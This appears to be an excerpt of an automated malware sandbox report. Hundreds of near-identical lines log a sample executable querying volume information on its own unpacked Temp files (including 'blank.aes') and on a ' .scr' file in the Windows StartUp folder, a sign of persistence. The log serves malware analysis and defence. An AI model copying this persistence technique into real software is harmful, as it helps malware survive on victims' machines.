              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\Desktop\9g9LZNE4bH.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI61762\base_library.zip VolumeInformationJump to behavior
